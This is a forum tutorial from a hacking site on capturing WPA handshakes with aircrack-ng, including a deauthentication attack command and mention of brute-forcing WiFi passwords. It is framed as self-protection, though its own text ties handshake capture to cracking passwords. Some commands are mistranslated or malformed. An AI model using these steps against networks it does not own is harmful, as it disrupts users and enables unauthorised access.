What is 'Handshake' and how to catch it?

MaliciousX

Katılımcı Üye
16 Kas 2019
284
49
10
Nikomedya
What is 'Handshake' and how to catch it?
(
Taken from: https://www.turkhackteam.org/konular/handshake-nedir-ve-nasil-yakalanir.1982059/)

Nowadays, the concept of the network has become quite important. The concept of the network has also affected our daily lives. As an example, while you used to go to your workplace for a job interview, now job interviews are done with the help of the internet. We can give many examples of this kind of situations.

Internet networks have existed since the day they came to the homes of people who enter and use the Internet network without permission. These people can do anything legal or illegal using your internet! In a possible occurrence of a bad event, you may get dizzy and anxious since you are the network owner. To counter such situations or if you think someone has hacked into your network, you can capture a handshake. Before catching a handshake, let's learn its general definition.

PicsArt_04-29-01.57.47.md.jpg


THT INTELLIGENCE TEAM


What is a Handshake?

It is the authentication protocol between the access point and the devices connected to the network. This protocol shake hands with devices connected to the network. For every device connected to a network, a handshake authenticates us. After verification, the device connects to the network. If there is no handshake, meaning we cannot connect to the network unless there is a handshake.
I will give you an example to make you understand the concept of a handshake better. When you try to connect to WiFi with your phone at home or elsewhere, a notification called "authenticating" appears, and after a few seconds, a notification that says "connected to the network" appears. Which Handshake applies the authentication process. If Handshake does not work correctly or does not work at all, a text such as "A problem occurred in the authentication." will appear after the text "authenticating" when trying to connect to the network.

PicsArt_04-25-03.35.15.jpg


istihbarat-konu-araligi-35fd2a1723d502d7f.png


What does it mean to catch a Handshake?

The term handshake capture differs a little from its meaning. So we know that handshake is an authentication protocol. It can look a bit absurd when it comes to catching an authentication protocol instead of catching a handshake. Don't worry, the term handshake capture is used to crack the passwords found on WiFis.


There is an application that we need to use to capture handshakes which is called Wifislax. This application can be used on Linux and Windows operating systems. This application cracks the password by making a Brute Force attack on the target WiFi network. There are also mobile applications or pc applications similar to Wifislax. However, most of these applications either do not work, come out with malware or require root privileges.


To use the Wifislax application, we need to write itself to the flash memory and then boot the device. In order to write Wifislax to the flash memory, we need to download Rufus. As understood, it is a difficult job.


PicsArt_04-27-01.14.05.md.jpg


istihbarat-konu-araligi-35fd2a1723d502d7f.png


How to catch a Handshake?


I mentioned that we can capture handshakes with Wifislax. This is the most popular and the most troublesome way to capture handshakes. I'll do it with another popular way, Aircrack.

First, let's start our Linux terminal and turn on our Wireless card in monitor mode to start our process with the following command:

Kod:
airmon-ng start wlan0

PicsArt_04-28-12.44.58.md.jpg


After switching the wireless card to the monitor mode, let's look at the wireless network cards. So it will be seen whether we are good to go.

Kod:
iwconfig

PicsArt_04-28-12.45.52.md.jpg


Monitor mode is now switched, let's find the WiFi networks around us.

Kod:
airodump-ng wlan0mon

PicsArt_04-28-12.46.35.md.jpg


After this process, we will see the nets. Let's find the mac address of our mouth from here.

PicsArt_04-28-12.47.57.md.jpg


After we find the mac address of our network, we will try to find the handshake.

Kod:
airodump - -bssid ağınızın mac adresi - -channel [ağınızın kanal numarası - -write sonuçları yazmak istediğiniz dosya adı wlan0mon

PicsArt_04-28-12.49.23.md.jpg


After this operation, you can capture a handshake as long as you do not turn off the terminal. It can take hours to detect the person connecting to the network. So I'm going to disconnect from the network by doing a deauth attack so we'll see a handshake that the network has been left. To do this attack, we create a new tab and type the following command.

Kod:
aireplay-ng - -deauth yapılmak istenen saldırı sayısı -a ağın mac adresi wlanm0n

PicsArt_04-28-12.50.07.md.jpg


After waiting for a while, it will conduct a deauth attack for the number of times you set. This process varies according to the number of attacks.

PicsArt_04-28-12.51.28.md.jpg


After the attack happens, we check the open tab to catch the handshake. If there is one, it will be caught.

PicsArt_04-28-12.53.48.md.jpg


istihbarat-konu-araligi-35fd2a1723d502d7f.png


Today we learned how we can capture a handshake. Capturing a real handshake will come in handy if you suspect your WiFi has been hacked.
See you in the other tutorial.
 

h4ck3rz

Katılımcı Üye
15 Mar 2021
481
182
Thank's:)
congratulations, it is a useful topic, let's share it in Turkish sometime
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.